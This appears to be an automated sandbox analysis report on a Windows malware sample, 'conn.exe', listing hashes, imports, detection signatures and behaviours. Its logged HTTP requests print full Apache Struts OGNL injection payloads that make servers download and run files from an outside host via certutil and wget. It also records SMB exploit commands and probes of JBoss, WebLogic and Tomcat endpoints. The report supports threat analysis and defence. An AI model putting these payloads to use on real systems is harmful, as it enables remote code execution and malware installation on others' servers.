infosec binary analisys conn · infosec binary analisys shell32.dll ole32.dll ws2_32.dll user32.dll...

Infosec Binary Analisys

conn.exe

MalScore: 100

File type: MS-DOS executable, MZ for MS-DOS

File size: 2427.00 KB (2485248 bytes)

Compile time: 2018-11-07 09:25:16

MD5: f810c1becd5ed57333ae28d1e085b772

SHA1: bde4104e8f1a5b8d68d940adb1300a2abc5dd0aa

Import hash: d9362ccf7828b415b9cc03e731a349f8

Submitted: 2018-11-09 13:09:08

URL(s) file hosting

http://111.90.158.225/d/conn.exe

Antivirus Report

Report date Detection Ratio Permalink

2018-11-09 09:12:07 46/66

Import library

WLDAP32.dll

ADVAPI32.dll

KERNEL32.dll

OLEAUT32.dll

Date: 2020-02-15 01:57:34

https://www.virustotal.com/file/83afed2247fd1edf14593c15d4111c181179f75b163c5ea5a1db7a30f2cbf5ae/analysis/1541754727


SHELL32.dll

ole32.dll

WS2_32.dll

USER32.dll

13 Behaviors detected by system signatures

Created network traffic indicative of malicious activity

- signature: ET EXPLOIT Apache Struts getWriter and opensymphony inbound OGNL injectionremote code execution attempt - signature: Traffico Anomalo ? Start Traffico) - signature: ET WEB_SERVER WGET Command Specifying Output in HTTP Headers - signature: ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection - signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "db" (Soc-Rule) - signature: ET EXPLOIT Apache Struts memberAccess and opensymphony inbound OGNLinjection remote code execution attempt - signature: ET EXPLOIT Apache Struts memberAccess and getWriter inbound OGNL injectionremote code execution attempt - signature: ET EXPLOIT Apache Struts Possible OGNL Java Exec In URI - signature: ET WEB_SERVER Possible Apache Struts OGNL in Dynamic Action - signature: ET SCAN Potential VNC Scan 5900-5920 - signature: ET SCAN Potential VNC Scan 5800-5820 - signature: ET WEB_SERVER Possible SQL Injection (exec) - signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "common"(Soc-Rule) - signature: ET SCAN Suspicious inbound to Oracle SQL port 1521 - signature: ET EXPLOIT Apache Struts Possible OGNL Java ProcessBuilder in client body - signature: ET WEB_SERVER Suspicious Chmod Usage in URI

Uses Windows utilities for basic functionality

- command: cmd.exe /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 192.168.0.0 & star.exe--OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayloaddown64.dll --TargetIp 192.168.0.0 - command: cmd.exe /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 192.168.0.1 & star.exe--OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayloaddown64.dll --TargetIp 192.168.0.1

The binary likely contains encrypted or compressed data.

- section: name: .MPRESS1, entropy: 8.00, characteristics:IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0025d000, virtual_size: 0x00733000

Unconventionial language used in binary resources: Chinese (Simplified)

Performs some HTTP requests

- url: http://192.168.0.0/ - url: http://192.168.0.0/ws_utc/resources/setting/options/general - url:http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExclude

Date: 2020-02-15 01:57:34


dPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url:http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url:http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url:http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url: http://192.168.0.0/invoker/readonly - url: http://192.168.0.0/invoker/JMXInvokerServlet - url: http://192.168.0.0/jmx-console/HtmlAdaptor - url: http://192.168.0.0/orders.xhtml - url: http://192.168.0.0/users - url: http://192.168.0.0/dba_put.jsp/ - url: http://192.168.0.0/dba_put.jsp - url: http://192.168.0.0/manager/html - url: http://192.168.0.0/wls-wsat/CoordinatorPortType - url: http://192.168.0.0:113/ - url: http://183.91.67.0/ - url: http://183.91.67.0/ws_utc/resources/setting/options/general - url:http://183.91.67.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action

Date: 2020-02-15 01:57:34


- url:http://183.91.67.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url:http://183.91.67.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url:http://183.91.67.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url: http://183.91.67.0/invoker/readonly - url: http://183.91.67.0/invoker/JMXInvokerServlet - url: http://183.91.67.0/jmx-console/HtmlAdaptor - url: http://183.91.67.0/orders.xhtml - url: http://183.91.67.0/users - url: http://183.91.67.0/dba_put.jsp/ - url: http://183.91.67.0/dba_put.jsp - url: http://183.91.67.0/manager/html - url: http://183.91.67.0/wls-wsat/CoordinatorPortType - url: http://183.91.67.0:113/ - url: http://192.168.0.0:3389/ - url: http://183.91.67.0:3389/ - url: http://192.168.0.1/ - url: http://192.168.0.1/ws_utc/resources/setting/options/general - url:http://192.168.0.1/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url:http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcach

Date: 2020-02-15 01:57:34


e%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url:http://192.168.0.1/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url:http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - url: http://192.168.0.1/invoker/readonly - url: http://192.168.0.1/invoker/JMXInvokerServlet - url: http://192.168.0.1/jmx-console/HtmlAdaptor - url: http://192.168.0.1/orders.xhtml - url: http://192.168.0.1/users - url: http://192.168.0.1/dba_put.jsp/ - url: http://192.168.0.1/dba_put.jsp - url: http://192.168.0.1/manager/html - url: http://192.168.0.1/wls-wsat/CoordinatorPortType - url: http://192.168.0.1:113/

HTTP traffic contains suspicious features which may be indicative of malware related traffic

- post_no_referer: HTTP traffic contains a POST request with no referer header - get_no_useragent: HTTP traffic contains a GET request with no user-agent header - ip_hostname: HTTP connection was made to an IP address rather than domain name - suspicious_request: http://192.168.0.0/ - suspicious_request: http://192.168.0.0/ws_utc/resources/setting/options/general - suspicious_request:http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cf

Date: 2020-02-15 01:57:34


ast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request: http://192.168.0.0/invoker/readonly - suspicious_request: http://192.168.0.0/invoker/JMXInvokerServlet - suspicious_request: http://192.168.0.0/jmx-console/HtmlAdaptor - suspicious_request: http://192.168.0.0/orders.xhtml - suspicious_request: http://192.168.0.0/users - suspicious_request: http://192.168.0.0/dba_put.jsp/ - suspicious_request: http://192.168.0.0/dba_put.jsp - suspicious_request: http://192.168.0.0/manager/html - suspicious_request: http://192.168.0.0/wls-wsat/CoordinatorPortType - suspicious_request: http://192.168.0.0:113/ - suspicious_request: http://183.91.67.0/ - suspicious_request: http://183.91.67.0/ws_utc/resources/setting/options/general - suspicious_request:http://183.91.67.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://183.91.67.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://183.91.67.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExclude

Date: 2020-02-15 01:57:34


dPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://183.91.67.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request: http://183.91.67.0/invoker/readonly - suspicious_request: http://183.91.67.0/invoker/JMXInvokerServlet - suspicious_request: http://183.91.67.0/jmx-console/HtmlAdaptor - suspicious_request: http://183.91.67.0/orders.xhtml - suspicious_request: http://183.91.67.0/users - suspicious_request: http://183.91.67.0/dba_put.jsp/ - suspicious_request: http://183.91.67.0/dba_put.jsp - suspicious_request: http://183.91.67.0/manager/html - suspicious_request: http://183.91.67.0/wls-wsat/CoordinatorPortType - suspicious_request: http://183.91.67.0:113/ - suspicious_request: http://192.168.0.0:3389/ - suspicious_request: http://183.91.67.0:3389/ - suspicious_request: http://192.168.0.1/ - suspicious_request: http://192.168.0.1/ws_utc/resources/setting/options/general - suspicious_request:http://192.168.0.1/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://192.168.0.1/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%

Date: 2020-02-15 01:57:34


20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request:http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action - suspicious_request: http://192.168.0.1/invoker/readonly - suspicious_request: http://192.168.0.1/invoker/JMXInvokerServlet - suspicious_request: http://192.168.0.1/jmx-console/HtmlAdaptor - suspicious_request: http://192.168.0.1/orders.xhtml - suspicious_request: http://192.168.0.1/users - suspicious_request: http://192.168.0.1/dba_put.jsp/ - suspicious_request: http://192.168.0.1/dba_put.jsp - suspicious_request: http://192.168.0.1/manager/html - suspicious_request: http://192.168.0.1/wls-wsat/CoordinatorPortType - suspicious_request: http://192.168.0.1:113/

Drops a binary and executes it

- binary: C:\Users\All Users\mmkt.exe - binary: C:\Users\All Users\blue.exe - binary: C:\Users\All Users\star.exe

A process created a hidden window

- Process: conn.exe -> C:\Users\All Users\mmkt.exe - Process: conn.exe -> cmd.exe - Process: conn.exe -> cmd.exe

Dynamic (imported) function loading detected

- DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsFree - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/InitOnceExecuteOnce - DynamicLoader: kernel32.dll/CreateEventExW - DynamicLoader: kernel32.dll/CreateSemaphoreW - DynamicLoader: kernel32.dll/CreateSemaphoreExW - DynamicLoader: kernel32.dll/CreateThreadpoolTimer - DynamicLoader: kernel32.dll/SetThreadpoolTimer - DynamicLoader: kernel32.dll/WaitForThreadpoolTimerCallbacks - DynamicLoader: kernel32.dll/CloseThreadpoolTimer - DynamicLoader: kernel32.dll/CreateThreadpoolWait - DynamicLoader: kernel32.dll/SetThreadpoolWait - DynamicLoader: kernel32.dll/CloseThreadpoolWait - DynamicLoader: kernel32.dll/FlushProcessWriteBuffers

Date: 2020-02-15 01:57:34


